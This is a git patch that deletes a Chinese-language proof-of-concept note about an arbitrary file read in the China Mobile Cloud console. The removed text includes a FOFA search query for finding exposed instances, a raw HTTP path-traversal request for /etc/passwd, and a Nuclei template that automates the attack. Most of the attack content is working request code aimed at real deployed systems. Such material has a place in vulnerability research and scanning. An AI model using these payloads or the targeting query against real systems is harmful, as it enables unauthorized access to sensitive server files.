From 93b82ad285e02d62c2f100b35fa368b880b0dadb Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Tue, 18 Jun 2024 15:39:14 +0800
Subject: [PATCH] =?UTF-8?q?Delete=20=E4=B8=AD=E5=9B=BD=E7=A7=BB=E5=8A=A8?=
 =?UTF-8?q?=E4=BA=91=E6=8E=A7=E5=88=B6=E5=8F=B0=E5=AD=98=E5=9C=A8=E4=BB=BB?=
 =?UTF-8?q?=E6=84=8F=E6=96=87=E4=BB=B6=E8=AF=BB=E5=8F=96.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 中国移动云控制台存在任意文件读取.md | 50 -----------------------------
 1 file changed, 50 deletions(-)
 delete mode 100644 中国移动云控制台存在任意文件读取.md

diff --git a/中国移动云控制台存在任意文件读取.md b/中国移动云控制台存在任意文件读取.md
deleted file mode 100644
index f1e6d6c..0000000
--- a/中国移动云控制台存在任意文件读取.md
+++ /dev/null
@@ -1,50 +0,0 @@
-## 中国移动云控制台存在任意文件读取
-
-中国移动云控制台是一套用于统一查看和管理移动云产品及服务的系统，移动云控制台存在文件任意读取漏洞，未授权攻击者可以利用其读取网站配置文件等敏感信息
-
-## fofa
-
-```
-body="op-login-static/favicon.ico" || header="/oauth2/code/opgateway"
-```
-
-## poc
-
-```
-GET /api/query/helpcenter/api/v2/preview?fileName=../../../../../../../../etc/passwd HTTP/1.1
-Host: ip
-```
-
-![image-20240602201314531](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406022013615.png)
-
-
-
-## Yaml
-
-```
-id: cmecloud-console-readfile
-
-info:
-  name: 移动云控制台存在任意文件读取
-  author: onewin
-  severity: high
-  description: 移动云控制台存在任意文件读取
-
-http:
-- raw:
-  - |+
-    @timeout: 30s
-    GET /api/query/helpcenter/api/v2/preview?fileName=../../../../../../../../etc/passwd HTTP/1.1
-    Host: {{Hostname}}
-
-  matchers-condition: and
-  matchers:
-      - type: status
-        status:
-          - 200
-      - type: word
-        words:
-          - "root"
-        part: body
-```
-